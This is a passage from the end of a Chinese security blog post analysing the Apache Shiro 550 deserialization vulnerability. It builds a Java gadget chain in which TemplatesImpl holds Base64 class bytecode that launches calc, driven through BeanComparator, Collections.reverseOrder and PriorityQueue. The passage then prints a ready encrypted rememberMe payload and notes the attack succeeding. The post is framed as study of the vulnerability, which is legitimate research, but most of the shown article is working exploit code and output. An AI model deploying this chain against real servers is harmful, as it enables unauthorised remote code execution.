<p>这里可以有很多选择，phith0n原文中用的是<code>CaseInsensitiveComparator</code>，它是String类中的一个子类，满足上面的所有条件。</p>
<p>这里我用的是<code>java.util.Collections$ReverseComparator2</code>，也能满足条件，怎么获取它的实例，看对应的类怎么写的就行，这里用<code>Collections.reverseOrder()</code>即可获取一个对应的实例。</p>
<p>下面构造测试代码：在CB-1的基础上稍微改一下就行了</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception {</span><br><span class="line">    <span class="type">byte</span>[] CalcCode = Base64.getDecoder().decode(</span><br><span class="line">            <span class="string">"yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEA"</span> +</span><br><span class="line">                    <span class="string">"CXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RP"</span> +</span><br><span class="line">                    <span class="string">"TTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0a"</span> +</span><br><span class="line">                    <span class="string">"W9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKEx"</span> +</span><br><span class="line">                    <span class="string">"jb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hc"</span> +</span><br><span class="line">                    <span class="string">"GFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS9"</span> +</span><br><span class="line">                    <span class="string">"4bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAA"</span> +</span><br><span class="line">                    <span class="string">"ygpVgcAGwEAClNvdXJjZUZpbGUBABBUZW1wbGF0ZVBPQy5qYXZhDAAOAA8HABwMAB0AHgEABGNhbGM"</span> +</span><br><span class="line">                    <span class="string">"MAB8AIAEAC1RlbXBsYXRlUE9DAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzb"</span> +</span><br><span class="line">                    <span class="string">"HRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnR"</span> +</span><br><span class="line">                    <span class="string">"lcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL"</span> +</span><br><span class="line">                    <span class="string">"2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQA"</span> +</span><br><span class="line">                    <span class="string">"nKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAADAAEABwAIA"</span> +</span><br><span class="line">                    <span class="string">"AIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAALAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAA"</span> +</span><br><span class="line">                    <span class="string">"ABAAAAAGxAAAAAQAKAAAABgABAAAADwALAAAABAABAAwAAQAOAA8AAgAJAAAALgACAAEAAAAOKrcAA"</span> +</span><br><span class="line">                    <span class="string">"bgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAARAAQAEgANABMACwAAAAQAAQAQAAEAEQAAAAIAEg=="</span>);</span><br><span class="line">    <span class="type">TemplatesImpl</span> <span class="variable">calcTemp</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">TemplatesImpl</span>();</span><br><span class="line">    setFieldValue(calcTemp, <span class="string">"_bytecodes"</span>, <span class="keyword">new</span> <span class="title class_">byte</span>[][]{CalcCode});</span><br><span class="line">    setFieldValue(calcTemp, <span class="string">"_name"</span>, <span class="string">"CalcTemplatesImpl"</span>);</span><br><span class="line">    setFieldValue(calcTemp, <span class="string">"_tfactory"</span>, <span class="keyword">new</span> <span class="title class_">TransformerFactoryImpl</span>());</span><br><span class="line"></span><br><span class="line">    <span class="type">BeanComparator</span> <span class="variable">comparator</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">BeanComparator</span>();</span><br><span class="line">    <span class="type">PriorityQueue</span> <span class="variable">queue</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">PriorityQueue</span>&lt;&gt;(<span class="number">2</span>, comparator);</span><br><span class="line">    queue.add(<span class="string">"3xsh0re"</span>);</span><br><span class="line">    queue.add(<span class="string">"CB-1"</span>);</span><br><span class="line"></span><br><span class="line">    setFieldValue(comparator, <span class="string">"property"</span>, <span class="string">"outputProperties"</span>);</span><br><span class="line">    setFieldValue(comparator, <span class="string">"comparator"</span>, Collections.reverseOrder());<span class="comment">// here!</span></span><br><span class="line">    setFieldValue(queue, <span class="string">"queue"</span>, <span class="keyword">new</span> <span class="title class_">Object</span>[]{calcTemp, calcTemp});</span><br><span class="line">}</span><br></pre></td></tr></table></figure>

<p>用加密函数生成一个payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">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</span><br></pre></td></tr></table></figure>

<p>攻击：</p>
<p><img src="/2024/08/24/Shiro550%E5%88%86%E6%9E%90/image-20241009200315744.png"></p>
<p>当然这里还有一些报错，不过这是武器化该解决的问题，这里暂且不提。</p>
<p><a target="_blank" rel="noopener" href="https://github.com/3xsh0re/CCetc_Gadget_Analysis">CB-Shiro完整Demo</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/about/">关于</a></li>
        
          <li><a href="/archives/">归档</a></li>
        
          <li><a target="_blank" rel="noopener" href="http://github.com/3xsh0re">项目</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%85%8D%E7%BD%AE%E7%8E%AF%E5%A2%83"><span class="toc-number">1.</span> <span class="toc-text">配置环境</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%B0%83%E8%AF%95%E5%88%86%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">调试分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#POC%E6%9E%84%E9%80%A0"><span class="toc-number">3.</span> <span class="toc-text">POC构造</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/&text=Shiro反序列化漏洞分析"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/&title=Shiro反序列化漏洞分析"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/&is_video=false&description=Shiro反序列化漏洞分析"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Shiro反序列化漏洞分析&body=Check out this article: https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/&title=Shiro反序列化漏洞分析"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/&title=Shiro反序列化漏洞分析"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/&title=Shiro反序列化漏洞分析"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/&title=Shiro反序列化漏洞分析"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/&name=Shiro反序列化漏洞分析&description=&lt;p&gt;Shiro&lt;/p&gt;"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://3xsh0re.github.io/2024/08/24/Shiro550%E5%88%86%E6%9E%90/&t=Shiro反序列化漏洞分析"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2026
    3xsh0re
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/3xsh0re">项目</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/tororo.model.json"},"display":{"position":"right","width":150,"height":300,"hOffset":-15,"vOffset":-15},"mobile":{"show":true},"react":{"opacity":0.7},"log":false});</script></body>
</html>
